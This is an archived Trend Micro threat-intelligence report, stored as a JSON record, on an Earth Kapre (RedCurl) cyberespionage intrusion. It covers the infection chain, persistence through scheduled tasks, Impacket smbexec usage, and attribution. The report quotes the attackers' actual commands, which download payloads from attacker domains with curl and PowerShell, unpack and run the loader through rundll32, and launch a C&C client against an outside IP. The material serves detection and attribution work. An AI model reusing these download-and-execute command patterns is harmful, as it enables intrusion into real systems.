{ "id": "bd6bbe32-a89f-419e-b44e-62a99b5939e1", "created_at": "2026-04-06T00:08:18.644456Z", "updated_at": "2026-04-10T03:30:34.704338Z", "deleted_at": null, "sha1_hash": "73e3ac4f56cf229969dd6b1193a1c28c6bd36318", "title": "Unveiling Earth Kapre aka RedCurl’s Cyberespionage Tactics With Trend Micro MDR, Threat Intelligence", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2895707, "plain_text": "Unveiling Earth Kapre aka RedCurl’s Cyberespionage Tactics With\r\nTrend Micro MDR, Threat Intelligence\r\nBy By: Mohamed Fahmy Mar 06, 2024 Read time: 11 min (2850 words)\r\nPublished: 2024-03-06 · Archived: 2026-04-05 17:13:13 UTC\r\nAPT \u0026 Targeted Attacks\r\nThis blog entry will examine Trend Micro MDR team's investigation that successfully uncovered the intrusion sets\r\nemployed by Earth Kapre in a recent incident, as well as how the team leveraged threat intelligence to attribute the extracted\r\nevidence to the cyberespionage threat group.\r\nThe espionage group Earth Kapre (aka RedCurl and Red Wolf) has been actively conducting phishing campaigns targeting\r\norganizations in Russia, Germany, Ukraine, the United Kingdom, Slovenia, Canada, Australia, and the US. It uses phishing\r\nemails that contain malicious attachments (.iso and .img), which lead to successful infections upon opening. This triggers the\r\ncreation of a scheduled task for persistence, alongside the unauthorized collection and transmission of sensitive data to\r\ncommand-and-control (C\u0026C) servers.\r\nThe Trend Micro Managed Extended Detection and Response (MDR) and Incident Response (IR) team conducted an\r\ninvestigation of an incident where numerous machines were infected by the Earth Kapre downloader.  This piece of malware\r\nwas observed establishing connections with its C\u0026C servers, suggesting a potential data theft scenario. Interestingly, in this\r\ninstance, Earth Kapre has returned to using a previously known technique that is distinct from its more recent campaigns: It\r\nused legitimate tools Powershell.exe and curl.exe to procure the subsequent stage downloader. In an attempt to blend into\r\nthe network and evade detection, Earth Kapre was found to have used the Program Compatibility Assistant (pcalua.exe) to\r\nexecute malicious command lines.\r\nThis blog entry will examine Trend Micro MDR team's investigation that successfully uncovered the intrusion sets\r\nemployed by Earth Kapre in a recent incident, as well as how the team leveraged threat intelligence to attribute the extracted\r\nevidence to the cyberespionage threat group.\r\nMDR investigation\r\nThe Trend Micro MDR threat hunting team initially detected the creation of a suspicious file in C:\\Windows\\System32\\ms.dll\r\n(detected by Trend Micro as Trojan.Win64.CRUDLER.A). Further investigation revealed the use of curl.exe to download\r\nthe file from the following URLs:\r\nhttp://preston[.]melaniebest[.]com/ms/ms.tmp\r\nhttps://preslive[.]cn[.]alphastoned.pro/ms/msa.tmp\r\nhttps://unipreg[.]tumsun[.]com/ms/psa.tmp\r\nhttp://report[.]hkieca[.]com/ms/msa.tmp\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 1 of 16\n\nFigure 1. Trend Vision One™ Execution Profile shows the downloaded Earth Kapre loader using “curl.exe”\r\nfrom “http://preston[.]melaniebest[.]com” (23[.]254[.]224[.]79).\r\nAfter examining the events around the time the file was created, we discovered that the threat actor executed the following\r\nactions:\r\nWe observed that the initial command employs PowerShell to download a file (curl.tmp) from the URL\r\nhttp://preston[.]melaniebest[.]com/ms/curl.tmp and saves it as curl.exe in the C:\\Windows\\System32\\ directory. For the\r\nbenefit of this analysis, we will use this domain, but the same analysis should hold for the other domains in the previously\r\nmentioned list of URLs. Curl.exe is a command-line tool and library designed for efficient data transfer with URLs. While it\r\nis a legitimate tool, it can also be abused by threat actors for malicious purposes.\r\n%COMSPEC% /Q /c echo powershell -c \"iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile\r\nC:\\Windows\\System32\\curl.exe -UseBasicParsing\" ^\u003e \\\\127.0.0.1\\C$\\dvPqyh 2^\u003e^\u00261 \u003e %TEMP%\\KzIMnc.bat \u0026\r\n%COMSPEC% /Q /c %TEMP%\\KzIMnc.bat \u0026 %COMSPEC% /Q /c del %TEMP%\\KzIMnc.bat\r\nNext, 7za.tmp was downloaded and saved as 7za.exe in C:\\Windows\\System32\\ directory. 7za.exe is a copy of 7-Zip, a\r\npopular open-source file compression and archiving utility.\r\nC:\\Windows\\system32\\cmd.exe /Q /c echo curl -o C:\\Windows\\System32\\7za.exe\r\nhttp://preston[.]melaniebest[.]com/ms/7za.tmp ^\u003e \\\\127.0.0.1\\C$\\xWJhao 2^\u003e^\u00261 \u003e C:\\Windows\\TEMP\\IAqJUm.bat \u0026\r\nC:\\Windows\\system32\\cmd.exe /Q /c C:\\Windows\\TEMP\\IAqJUm.bat \u0026 C:\\Windows\\system32\\cmd.exe /Q /c del\r\nC:\\Windows\\TEMP\\IAqJUm.bat\r\nThe Earth Kapre loader was then downloaded using curl.exe from the same domain,\r\nhttp://preston[.]melaniebest[.]com/ms/ms.tmp, and was saved as ms.dll (though it should be noted that in some machines,\r\nthe file name used was ps.dll) in the C:\\Windows\\System32\\ directory. The threat actors used echo (as also seen in previous\r\ncommands) and outputted it into a batch file, which is a commonly employed obfuscation technique. By echoing the\r\ncommand into a batch file, they could dynamically generate and execute commands, making it harder to analyze or detect\r\nmalicious activities. The use of temporary batch files also allows for task automation and easier security monitoring evasion.\r\nWe observed that the threat actors deleted the batch file afterward to cover their tracks.\r\nC:\\Windows\\system32\\cmd.exe /Q /c echo curl -o C:\\Windows\\System32\\ms.dll\r\nhttp://preston[.]melaniebest.com/ms/ms.tmp ^\u003e \\\\127.0.0.1\\C$\\tZpOKq 2^\u003e^\u00261 \u003e C:\\Windows\\TEMP\\DFMPAa.bat \u0026\r\nC:\\Windows\\system32\\cmd.exe /Q /c C:\\Windows\\TEMP\\DFMPAa.bat \u0026 C:\\Windows\\system32\\cmd.exe /Q /c del\r\nC:\\Windows\\TEMP\\DFMPAa.bat\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 2 of 16\n\nSince ms.tmp is an archive, the threat actors would need to use the previously downloaded 7za.exe (7zip) to extract file\r\ncontents via the password “123”.\r\nC:\\Windows\\system32\\cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:\\Windows\\Temp\\ms.tmp -o C:\\Windows\\Temp\\ ^\u003e\r\n\\\\127.0.0.1\\C$\\lgNMiK 2^\u003e^\u00261 \u003e C:\\Windows\\TEMP\\BuWmUA.bat \u0026 C:\\Windows\\system32\\cmd.exe /Q /c\r\nC:\\Windows\\TEMP\\BuWmUA.bat \u0026 C:\\Windows\\system32\\cmd.exe /Q /c del C:\\Windows\\TEMP\\BuWmUA\r\nRundll32.exe was then used to execute ms.dll on the machine (in some machines, ps.dll was executed).\r\n%COMSPEC% /Q /c echo rundll32.exe C:\\Windows\\system32\\ms.dll,ms ^\u003e \\\\127.0.0.1\\C$\\NoajCy 2^\u003e^\u00261 \u003e\r\n%TEMP%\\YdEcul.bat \u0026 %COMSPEC% /Q /c %TEMP%\\YdEcul.bat \u0026 %COMSPEC% /Q /c del %TEMP%\\YdEcul.bat\r\nThe Python script was crafted to establish outbound communication and execute remote commands using Server Message\r\nBlock (SMB) via port 445. During the execution of the script named client.py, an external IP address, 198[.]252[.]101[.]86,\r\nis passed as a command-line argument, suggesting its potential role as a C\u0026C server.\r\n\"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\MUIService\\pythonw.exe\"  C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Roaming\\MUIService\\rpv\\client.py --server-ip 198[.]252[.]101[.]86 --server-port 41808\r\nThe presence of Impacket\r\nImpacket is an open-source collection of Python classes for constructing and manipulating network protocols. Impacket\r\nactivity was detected in the organization’s network, indicating its use of Windows network protocol interactions. The\r\nobserved command lines align with Impacket's smbexec script, enabling a semi-interactive shell via SMB. Threat actors are\r\ndrawn to Impacket's versatility and exploit its capabilities for unauthorized command execution, as highlighted in this blog\r\nentry.\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 3 of 16\n\nFigure 2. Evidence of Impacket-related services in the registry\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 4 of 16\n\nFigure 3. An example of Impacket‘s execution observed in the registry via Trend Vision One Execution\r\nProfile\r\nThe command lines we identified in our investigation closely resembled Impacket’s smbexec script, as demonstrated in the\r\nsucceeding examples:\r\nRegistry root: 3\r\nRegistry key: HKLM\\SYSTEM\\CurrentControlSet\\Services\\aQpzRMnIku\r\nRegistry value name: imagepath\r\nRegistry value data: %COMSPEC% /Q /c echo rundll32.exe C:\\Windows\\system32\\ms.dll,ms ^\u003e \\\\127.0.0.1\\C$\\NoajCy\r\n2^\u003e^\u00261 \u003e %TEMP%\\YdEcul.bat \u0026 %COMSPEC% /Q /c %TEMP%\\YdEcul.bat \u0026 %COMSPEC% /Q /c del\r\n%TEMP%\\YdEcul.bat\r\nRegistry value type: 2\r\nRegistry root: 3\r\nRegistry key: HKLM\\SYSTEM\\CurrentControlSet\\Services\\kPbzlGKCyO\r\nRegistry value name: imagepath\r\nRegistry value data: %COMSPEC% /Q /c echo curl -o C:\\Windows\\System32\\ms.dll\r\nhttp://preston.melaniebest.com/ms/ms.tmp ^\u003e \\\\127.0.0.1\\C$\\tZpOKq 2^\u003e^\u00261 \u003e %TEMP%\\DFMPAa.bat \u0026\r\n%COMSPEC% /Q /c %TEMP%\\DFMPAa.bat \u0026 %COMSPEC% /Q /c del %TEMP%\\DFMPAa.bat\r\nRegistry value type: 2\r\nRegistry root: 3\r\nRegistry key: HKLM\\SYSTEM\\CurrentControlSet\\Services\\lzZqdAEwKP\r\nRegistry value name: imagepath\r\nRegistry value data: %COMSPEC% /Q /c echo curl -o C:\\Windows\\System32\\7za.exe\r\nhttp://preston.melaniebest.com/ms/7za.tmp ^\u003e \\\\127.0.0.1\\C$\\xWJhao 2^\u003e^\u00261 \u003e %TEMP%\\IAqJUm.bat \u0026\r\n%COMSPEC% /Q /c %TEMP%\\IAqJUm.bat \u0026 %COMSPEC% /Q /c del %TEMP%\\IAqJUm.bat\r\nRegistry value type: 2\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 5 of 16\n\nWe identified a command that appears to use netstat to check for an open port 4119. The purpose of this command might\r\ninvolve gathering network connection information linked to the specified port or checking for a specific pattern in the netstat\r\noutput. Port 4119 serves as the Trend Micro Deep Security Manager GUI and API port, suggesting that the threat actor could\r\nbe verifying the presence of the security program on this machine.\r\nRegistry root: 3\r\nRegistry key: HKLM\\SYSTEM\\CurrentControlSet\\Services\\zOMISPlXbL\r\nRegistry value name: imagepath\r\nRegistry value data: %COMSPEC% /Q /c echo netstat -an | find \"4119\" ^\u003e \\\\127.0.0.1\\C$\\SspgqD 2^\u003e^\u00261 \u003e\r\n%TEMP%\\MjHubF.bat \u0026 %COMSPEC% /Q /c %TEMP%\\MjHubF.bat \u0026 %COMSPEC% /Q /c del %TEMP%\\MjHubF.bat\r\nRegistry value type: 2\r\nFigure 4. Evidence of netstat checking if port 4419 is open\r\nAbusing the Program Compatibility Assistant Service via Indirect Command Execution\r\nThe Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to identify and address\r\ncompatibility issues with older programs. Adversaries can exploit this utility to enable command execution and bypass\r\nsecurity restrictions by using it as an alternative command-line interpreter. In this investigation, the threat actor uses this tool\r\nto obscure their activities.\r\nThe Earth Kapre downloader has been distributed across various locations under randomly generated or obfuscated file\r\nnames. The following are some enumerated examples that we discovered in our investigation:\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\AppList\\gkcb92eb2f8982d93a.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Wininet\\gkcb92eb2f8982d93a.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Wininet\\sgef07b190e6e6d160.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\AppList\\sgef07b190e6e6d160.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Subscription\\ujb7238088847c09ed.exe\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Local\\BrokerInfraSVR\\fik9562b2dec16c7ad6.exe\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Local\\BrokerInfra\\izd9562b2dec16c7ad6.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Sysmain\\zyp14f2b5c5ecbb07d8.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\tw-pfdc-320c6-4e95qd.tmp\\pj8434bb720ad953af.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\tw-pfdc-320c6-4e95qd.tmp\\kmjf1a1952febed5f77.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\DirectoryClient\\yff936ad712ca94fc9.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\D3DSCache\\85ceb3adf3f4542\\lva662fdf404f617d07.exe\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 6 of 16\n\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PRICache\\2630989932\\ogh0a430e919a35efd\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Plex\\ComponentODN\\ylob1c94b2421ca1d39.exe\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\VirtualStore\\ChromeSY_Q05MQVAyMw==.exe\r\nIn the following screenshot example, the file gkcb92eb2f8982d93a.exe, which was spawned by pcalua.exe, is observed\r\nestablishing a connection to preston[.]melaniebest[.]com, the same domain discussed in the previous section.\r\nFigure 5. Earth Kapre downloader connects to “preston[.]melaniebest[.]com”\r\nTo confirm the availability of a network connection, the Earth Kapre downloader sends an HTTP GET request directed at a\r\nrandomly selected network resource from the following list:\r\nwww.amazon.com\r\nwww.bing.com\r\nduckduckgo.com\r\nwww.ebay.com\r\nwww.google.com\r\nwww.google.co.uk\r\nwww.microsoft.com\r\nwww.msn.com\r\nocsp.digicert.com\r\nocsp.pki.goog\r\nocsp.usertrust.com\r\nopenid.ladatap.com\r\nwww.reddit.com\r\nunipreg.tumsun.com\r\nwww.wikipedia.org\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 7 of 16\n\nx1.c.lencr.org\r\nwww.yahoo.com\r\nBy analyzing the acquired Earth Kapre downloader sample file, we have confirmed that the InternetOpenA and\r\nInternetConnectA API functions were used. These functions facilitate HTTP requests and verify the presence of a network\r\nconnection.\r\nFigure 6. The Earth Kapre downloader confirms the network connection by sending an HTTP request to\r\nwww.yahoo.com.\r\nUse of scheduled tasks for persistence\r\nScheduled tasks were installed for persistence, as illustrated in Figure 7, where various tasks commenced before the Earth\r\nKapre downloader file was executed. Figure 7 further reveals the execution of the suspicious task CacheTask\r\nef07b190e6e6d160 just before the Earth Kapre downloader was executed.\r\nprocessCmd: C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule\r\nschtasks /run /tn \"\\Microsoft\\Windows\\Wininet\\CacheTask ef07b190e6e6d160\" \"pcalua.exe\" -a\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Wininet\\sgef07b190e6e6d160.exe\r\nFigure 7. Suspicious execution of scheduled tasks\r\nThe task names, file names, and file locations differ in each machine. Figure 8 displays evidence of malicious scheduled\r\ntasks that execute: C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Sysmain\\oxdece5f42fddfbde1.exe on an hourly basis.\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 8 of 16\n\nFigure 8. Evidence of persistence in scheduled tasks collected from “C:\\Windows\\System32\\Tasks”\r\nThe created task name varies per machine, but it incorporates a segment of the associated Earth Kapre downloader file\r\nname. For instance, if the file name is ef07b190e6e6d160.exe, the scheduled task will be named CacheTask\r\nef07b190e6e6d160. Table 1 displays examples of task names created across the infected machines in the network.\r\nschtasks /run /tn \"\\Microsoft\\Windows\\Wininet\\CacheTask ef07b190e6e6d160\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WDI\\ResolutionHost 8434bb720ad953af\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WDI\\ResolutionHost f1a1952febed5f77\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WindowsColorSystem\\Calibration-Loader 3db1281b443ad4a0\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WlanSvc\\CDSSync b1c94b2421ca1d39\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WOF\\WIM-Hash-Management 0a430e919a35efd8\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WwanSvc\\NotificationTask 662fdf404f617d07\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\BrokerInfrastructure\\BgTaskRegistrationMaintenanceTask 9eeb010c178ac301\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\CloudExperienceHost\\CreateObjectTask deacb04715b35f40\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag 8ba2c22cafd02f59\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\DeviceDirectoryClient\\HandleWnsCommand f936ad712ca94fc9\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\AppListBackup\\BackupNonMaintenance cb92eb2f8982d93a\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\Subscription\\LicenseAcquisition b7238088847c09ed\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\Sysmain\\ResPriStaticDbSync 14f2b5c5ecbb07d8\"\r\nTable 1. Task names created in infected machines\r\nTracing the point of entry\r\nGiven that the identified patient-zero machines lacked Trend Micro XDR installation, we had limited visibility when tracing\r\nthe point of entry for the attack. To address this gap, we attempted to complete the chain by identifying a similar\r\ninfrastructure observed in the incident. Utilizing the IP address 23[.]254[.]224[.]79 from our investigation, we\r\nsystematically pivoted across various data points through cyberthreat intelligence and deduced that the initial access was\r\ndelivered via a phishing email carrying a malicious attachment. The Earth Kapre samples found in the wild, including the\r\none used in this attack, share the same infrastructure and are often delivered through malicious ISO or IMG files received\r\nvia email.\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 9 of 16\n\nThe employment of cyberthreat intelligence methodologies, which encompassed data enrichment and correlation techniques,\r\nenhanced our capability to pinpoint the entry point, as illustrated in the following graph.\r\nFigure 9. Virus Total graph showing potential point of entry\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 10 of 16\n\nFigure 10. Earth Kapre attack chain\r\nAttribution analysis\r\nMultiple data points and indicators strongly indicate Earth Kapre's involvement in this attack, underscoring the ongoing\r\nactivity of this group, which we will explain in detail in this section.\r\n-       The C\u0026C infrastructure\r\nAll observed C\u0026C servers pivoted to 23[.]254[.]224[.]79, which is an IP address that’s been extensively used as a C\u0026C\r\nserver by Earth Kapre, based on samples found from the latter part of 2023 to the present.\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 11 of 16\n\nFigure 11. Enriching the data by pivoting and correlating the data points of “23[.]254[.]224[.]79”\r\nThe IP address 198[.]252[.]101[.]86, which was provided as an argument to the Client.py script, is linked to one of the\r\nphishing emails sent by the Earth Kapre group. This phishing email contains an attachment that leads to the download of a\r\nmalicious LNK file and the Earth Kapre downloader.\r\nFigure 12. Enriching the data by pivoting and correlating the data points of “198[.]252[.]101[.]86”\r\nThe connection between the IP address and the phishing email can be determined from the mail header, as the IP address\r\nappears as the first hop in the mail route from the threat actor to the victim.\r\nFigure 13. The connection between the 198[.]252[.]101[.]86 IP address and the phishing email\r\n-       Code and behavior similarities\r\nThe sample we examined exhibited code similarities with known Earth Kapre downloaders used in previous campaigns.\r\nWhile the sample from the incident we handled appeared somewhat different at first glance, a closer analysis revealed\r\nstriking similarities in functionality.\r\nFor example, the string decryption function in the new sample we examined gets addresses for Bcrypt APIs and calls them\r\nin the runtime as opposed to importing them, which is what older and available samples did. However, the sample we\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 12 of 16\n\nexamined decrypts strings in a way that’s reminiscent of the decryption technique used by older samples:\r\n1. Calculate SHA256 for hard-coded string (yxNLWpc0s4JUTR8O3GOJC).\r\n2. Use part of the hash as an encryption key for Advanced Encryption Standard (AES) decryption.\r\nFigure 14. The examined sample shows part of an old decryption technique and the calling of Bcrypt APIs.\r\nFigure 15. Getting API addresses in runtime\r\nFigure 16. Loads and initializes SHA256 algorithm\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 13 of 16\n\nFigure 17. Loads and initializes AES algorithm\r\nFigure 18. Uses BcryptDecrypt API to decrypt string\r\nThe simple comparison between the older and newer Earth Kapre downloader samples shows that there is a 70% to 90%\r\nsimilarity between the samples. We also noted a similarity in how the samples behaved, such as in the manner they check for\r\ninternet availability and communicate with their C\u0026C server.\r\nFigure 20. Checking for internet availability\r\nUsing the Diamond Model of Intrusion Analysis\r\nThe Diamond Model of Intrusion Analysis is a cybersecurity framework that’s crucial for intrusion analysis. It decodes\r\ncyberthreats by focusing on four key aspects: adversary, infrastructure, capability, and victim. Understanding the who, why,\r\nand how of cyberattacks helps cybersecurity professionals predict and prepare for threats. It explores the geographical\r\norigin, identity, sponsorship, motivation, and timeline of adversaries.\r\nAdversary: Threat Actor/Attacker\r\nCapabilities: Adversary’s tools and/or techniques\r\nInfrastructure: Physical and/or logical resources used by the adversary\r\nVictim: Organization or system hit by the adversary\r\nBy analyzing these four components together, the Diamond Model of Intrusion Analysis helps cybersecurity professionals\r\nand analysts gain a comprehensive understanding of a cyberthreat and aids in attributing the threat to a specific adversary or\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 14 of 16\n\ngroup. It provides a structured approach to organizing and analyzing available data, enhancing the ability of security teams\r\nto make informed decisions about cybersecurity strategies and responses.\r\nFigure 21. Earth Kapre tactics, techniques, and procedures (TTPs), victims, and infrastructure via the\r\nDiamond Model of Intrusion Analysis Framework\r\nIn the Diamond Model, we apply the \"Rule of Two\" guide, seeking consistent combinations across various intrusion sets. If\r\na particular combination exhibits two vertices in the Diamond Model, there is a better likelihood that we are confronting the\r\nsame threat actor.\r\nIn our analysis of this case, within the capability vertices of the Diamond Model, we compared the Earth Kapre sample from\r\nthe wild with the Earth Kapre sample acquired from the customer's environment. While the new samples showed an updated\r\nstructure, both samples connect to the same infrastructure. This consistency in capability and infrastructure strongly suggests\r\nan association with the Earth Kapre group.\r\nConclusion\r\nThis case underscores the ongoing and active threat posed by Earth Kapre, a threat actor that targets a diverse range of\r\nindustries across multiple countries. The actor employs sophisticated tactics, such as abusing PowerShell, curl, and Program\r\nCompatibility Assistant (pcalua.exe) to execute malicious commands, showcasing its dedication to evading detection within\r\ntargeted networks.\r\nThe detection of Impacket activity within the organization's network reveals a concerning trend in the abuse of this tool for\r\nWindows network protocol interactions. Threat actors are capitalizing on Impacket's versatility and exploiting its\r\nfunctionalities for unauthorized command execution.\r\nThis report emphasizes the significance of threat intelligence in bridging gaps within investigations, filling missing pieces of\r\nevidence that are crucial for comprehensive understanding and protection. Understanding the threat actor behind an attack is\r\nparamount for organizations seeking to bolster their defenses. This knowledge not only aids in identifying potential motives\r\nbut also allows for the implementation of tailored security measures to help prevent specific threats.\r\nThe role of MDR in uncovering intrusion sets, as demonstrated in this recent incident investigation, exemplifies its critical\r\ncontribution to cybersecurity. MDR played a key role in attributing the evidence extracted from the attack to the Earth Kapre\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 15 of 16\n\nthreat group. This reinforces the essential role of advanced threat detection and response solutions in effectively countering\r\nsophisticated threat actors.\r\nOrganizations should also consider using a multilayered approach to guard possible entry points into the system (endpoint,\r\nemail, web, and network). The following Trend Micro solutions can detect malicious components and suspicious behavior to\r\nhelp keep enterprises secure:\r\nTrend Vision Oneproducts provides multilayered protection and behavior detection, which helps block questionable\r\nbehavior and tools early on before ransomware can do irreversible damage to the system.\r\nTrend Cloud One™ – Workload Securityproducts protects systems against both known and unknown threats that\r\nexploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine\r\nlearning.\r\nTrend Micro™ Deep Discovery™ Email Inspectorproducts employs custom sandboxing and advanced analysis\r\ntechniques to effectively block malicious emails, including phishing emails that can serve as entry points for\r\nransomware.\r\nTrend Micro Apex One™products offers next-level automated threat detection and response against advanced\r\nconcerns such as fileless threats and ransomware, ensuring the protection of endpoints.\r\nIndicators of Compromise \r\nThe indicators of compromise for this entry can be found here.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "MITRE", "Malpedia" ], "references": [ "https://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html" ], "report_names": [ "unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html" ], "threat_actors": [ { "id": "6ec2cd63-307d-4281-86da-5dc199e932af", "created_at": "2025-08-07T02:03:24.821494Z", "updated_at": "2026-04-10T02:00:03.843522Z", "deleted_at": null, "main_name": "GOLD BLADE", "aliases": [ "Earth Kapre ", "Red Wolf ", "RedCurl " ], "source_name": "Secureworks:GOLD BLADE", "tools": [ "RedLoader" ], "source_id": "Secureworks", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f72f2981-0dc4-4d96-857c-a725a143a538", "created_at": "2024-03-21T02:00:04.724563Z", "updated_at": "2026-04-10T02:00:03.602417Z", "deleted_at": null, "main_name": "Earth Kapre", "aliases": [ "RedCurl", "Red Wolf", "GOLD BLADE" ], "source_name": "MISPGALAXY:Earth Kapre", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "79e95381-8008-48dc-b981-fd66e1c46ca6", "created_at": "2022-10-25T16:07:24.110478Z", "updated_at": "2026-04-10T02:00:04.869039Z", "deleted_at": null, "main_name": "RedCurl", "aliases": [ "Earth Kapre", "Red Wolf" ], "source_name": "ETDA:RedCurl", "tools": [ "Impacket", "LaZagne" ], "source_id": "ETDA", "reports": null }, { "id": "8108d548-e30f-4b90-aa60-71323ba66678", "created_at": "2024-11-01T02:00:52.667098Z", "updated_at": "2026-04-10T02:00:05.343786Z", "deleted_at": null, "main_name": "RedCurl", "aliases": [ "RedCurl" ], "source_name": "MITRE:RedCurl", "tools": null, "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434098, "ts_updated_at": 1775791834, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/73e3ac4f56cf229969dd6b1193a1c28c6bd36318.pdf", "text": "https://archive.orkl.eu/73e3ac4f56cf229969dd6b1193a1c28c6bd36318.txt", "img": "https://archive.orkl.eu/73e3ac4f56cf229969dd6b1193a1c28c6bd36318.jpg" } }